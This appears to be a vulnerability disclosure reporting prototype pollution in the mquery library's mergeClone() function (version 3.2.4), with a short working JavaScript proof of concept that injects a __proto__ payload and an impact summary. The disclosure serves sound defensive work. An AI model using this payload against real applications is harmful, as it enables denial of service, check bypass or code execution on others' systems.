✍️ Description

mquery is aware of the risk of prototype pollution in its exported functions cloneObject() and merge() and readily present protection by checking the key in var specialProperties = ['__proto__', 'constructor', 'prototype']. However, the current protection misses to protect another exported function mergeClone() which is also vulnerable to prototype pollution.

🕵️‍♂️ Proof of Concept

// PoC.js version of mquery is 3.2.4
mquery = require('mquery');
var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
console.log('Before:', {}.polluted); // undefined
mquery.utils.mergeClone({}, JSON.parse(malicious_payload));
console.log('After:', {}.polluted); // HACKED

💥 Impact

This vulnerability is capable of of polluting Object's prototypes and possibly leading to many kinds of attacks such as the denial-of-service, checking bypass, or potentially code execution.